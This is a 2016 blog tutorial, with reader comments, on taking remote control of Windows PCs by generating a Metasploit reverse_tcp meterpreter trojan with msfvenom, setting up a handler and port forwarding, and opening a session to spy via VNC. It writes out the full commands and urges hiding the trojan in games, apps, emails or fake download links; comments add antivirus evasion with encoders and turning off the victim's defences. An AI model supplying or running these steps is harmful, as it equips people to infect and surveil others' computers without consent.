How to hack windows 10 using kali linux remotely with metasploit – 2016

Microsoft claims that windows 10 has fixed all security vulnerabilities. We cant hack a windows PC with a remote exploit like ” ms08_067_netapi ” anymore. Windows have fixed that vulnerability. so sad. wait a minute, Then how can we hack a windows pc is that even possible now? The answer is yes, windows machines are still vulnerable to Trojan attacks regardless of versions. With this method you can hack any windows machines 10,8.1,8,7,vista and xp.

A trojan or a backdoor can give access to target machine remotely. we all know that, I’m not going too deep in explaining what a trojan is. Here we gonna use reverse_tcp trojan. This is a specially crafted malware that establish a remote connection to the hacker’s machine over Transition Control Protocol from the victim machine. This allows the hacker to breach into the machine and take full control over it.

Metasploit framework is one of the best tool that i love in kali linux. It has both handler and payload generator. Once the payload get executed on the target machine while the we are on listening mode in the handler section it spawns a meterpreter shell. This meterpreter shell allow us to communicate with the target system and execute shell commands. Compared to normal shell meterpreter has plenty of options. This can be done while the target is on the same LAN network or over the internet, there is no difference you just have to configure the router and payload accordingly. This process is dead simple. Follow the steps.

 

Demo Video

 

 

Router Configuration

This step is very important when your target is over the internet or WAN. Ignore this step if your target is on same LAN. To hack a pc over the internet means you have to communicate in both direction. To do this, your router/modem should open a port of your machine. This is called port forwarding. By default all ports are closed by your router/modem. Open a browser go to url http://192.168.1.1 Type in your username and password (by default password and username will be “admin“). This will take you to the router settings. Go to Advanced settings find port forwarding. Now click on add new set the start and end port to 444 (since we are using port 444 on metasploit). In the Ip address field you must type in your linux machine’s  internal ip. Save settings. you are done. You can double check by scanning your port with online port scanners.

 

 

Generate the Trojan

Generate the payload using msfvenom. set the port to 444 and ip to your public IP or local IP depending on your target.The generated trojan will try to connect to This IP and port when its executed. following command will generate the trojan in .exe format.
# msfvenom -p windows/meterpreter/reverse_tcp   — platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe
  
A trojan will be generated in the desktop. keep it aside and move on to handler section. fire up metasploit and follow the steps.
# msfconsole

Wait for a minute, msfconsole will come up. Use handler then, set payload and port.

1. Handler

msf> use multi/handler

2. set payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

3. Set local port

msf exploit(handler) > set LPORT 444

4. Set local host

msf exploit(handler) > set LHOST “attacker ip”

5. exploit

msf exploit(handler) > exploit

Wait for the target to connect back

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…

 

 

Execute the payload

Now you have to execute your trojan on the target system. Distributing the raw exe file is a bad idea, better encode it and attach with a normal application or a game or even email. once out trojan is in and executed a meterpreter session will be spawned.
[*] Started reverse handler on 192.168.1.104:444
[*] Starting the payload handler…
[*] Sending stage (83170 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.104:444 -> 192.168.1.105:36028) at 2016-05-20 03:20:45 -0500
meterpreter >
Meterpreter session allows you to execute system commands, networking commands, spy the screen and much more.

use help command to see the whole list of commands

meterpreter > help

Use this command to run vnc session and spy the target

meterpreter > run vnc
This whole process is simple but, the toughest part is getting the trojan in to the target user. Attaching the file along with games works great.
Read my blog on Privilege escalation in windows to know how to get admin privilege in a hacked system.
 Any doubts or questions? post it on the comment section below. If you like this blog give me a like on facebook and add me on google plus. Subscribe my youtube channel for video tutorials.
susmith HCK

susmith HCK

I’m a computer enthusiast basically and i love to write blogs on tech issues and cyber security. I started penetration testing at the age of 16 and i would like to explore security vulnerabilities and latest tech news and wanna share with you. If you like all these stuffs add me on Facebook and Google plus.

24 thoughts on “How to hack windows 10 using kali linux remotely with metasploit – 2016

    • May 22, 2016 at 8:32 pm
      Permalink

      You have to manually transfer the trojan eg: emails or fake download links.

      Reply
    • June 9, 2016 at 10:32 am
      Permalink

      കള്ള ഹിമാറേ …. സൈറ്റ് പൊളിച്ചു

      Reply
  • June 10, 2016 at 1:14 pm
    Permalink

    I refuse to accept that Windows 10 will remain untouchable for long. Remote exploits exist in many places, even as security awareness increases. There is always an oversight somewhere. It just takes the right person to find it.

    Reply
    • June 24, 2016 at 10:38 am
      Permalink

      yeah. im trying to find a remote exploit..

      Reply
  • June 10, 2016 at 1:14 pm
    Permalink

    I refuse to accept that Windows 10 will remain untouchable for long. Remote exploits exist in many places, even as security awareness increases. There is always an oversight somewhere. It just takes the right person to find it.

    Reply
    • June 28, 2016 at 2:09 pm
      Permalink

      Use veil-evasion or some better encoders. i use multiple encoders in random and it bypassed 30+ major anti virus / malware detectors

      Reply
  • August 18, 2016 at 12:08 am
    Permalink

    I run the payload and exploit but no session was created? Do you need to turn off Windows firewall etc?

    Reply
    • susmith HCK
      August 18, 2016 at 6:53 pm
      Permalink

      If the firewall has blocked the payload then you have to turn it off. It will giv u a popup message if blocked. if nothing happens then there is some problem with payload or metasploit listener. provide correct ip address and make sure both target and hacker machine can ping each other

      Reply
  • September 2, 2016 at 5:24 pm
    Permalink

    first of all u just have to stop the windows defender or the antivirus installed on your device.

    Reply
  • September 3, 2016 at 3:19 am
    Permalink

    if using virtual box, in order for WAN to work, do i have to find my IP in original machine? because when i use ‘ifconfig” i get 192.168.1.4 adress.

    Reply
    • susmith HCK
      September 3, 2016 at 10:34 am
      Permalink

      Google “mpy ip” you can find it there set that ip in the payload and in the router forward the port to “192.168.1.4” (kali machine)

      Reply
  • September 3, 2016 at 3:25 am
    Permalink

    how do i remove the virus after?

    Reply
    • susmith HCK
      September 3, 2016 at 10:36 am
      Permalink

      Actually this is not a persistent one so it won’t cause any serious damage after the end of the session. to remove it completely delete the exe and clear “temp” folder(START + R >> %temp% >> hit enter >> select all delete)

      Reply
  • September 25, 2016 at 10:48 pm
    Permalink

    # msfvenom -p windows/meterpreter/reverse_tcp –platform windows-a x86 -f exe LHOST=“attacker ip” LPORT=444 -o /root/Desktop/trojan.exe

    there is missing another “-” in front of -platform…
    (only on the site not in the video) 🙂

    Reply
      • susmith HCK
        September 26, 2016 at 1:22 pm
        Permalink

        its a bug in wordpress “–” is considered as single “-” . sorry fo that.

        Reply
    • November 5, 2016 at 12:10 am
      Permalink

      How to port forward on netis2419 can anyone guide me step by step. when ever i try to put my VM ip add its says invalid ip. what should i do now ????

      Reply
  • October 1, 2016 at 5:17 am
    Permalink

    Windows 10 remove its immediate 🙂

    Reply
    • October 13, 2016 at 9:12 pm
      Permalink

      Yes Sir! Same here.

      Reply
  • October 28, 2016 at 3:52 am
    Permalink

    Need to find a vulnerabilities [few in a fully patched Win10] and a remote exploit, with the rising security awareness it will be highly unlikely to execute an user dependant trojan…
    At it but so far no luck still…keep trying till you crack, or be cracked!!!!

    Reply
  • November 5, 2016 at 10:02 am
    Permalink

    Hi.
    That was a great video. Thank you for sharing. After starting the VNC I am seeing the desktop but can’t access it through Kali. Can you please help with this.

    Reply
  • January 8, 2017 at 11:11 pm
    Permalink

    Windows10 has more open vulnerabilities than you can imagine. Its like Microsoft locked one door open 10 others. Honestly we should be thankful for them as we can make more progress breaking & understanding how the brains at MS think. 😉

    Reply

Leave a Reply

Your email address will not be published. Required fields are marked *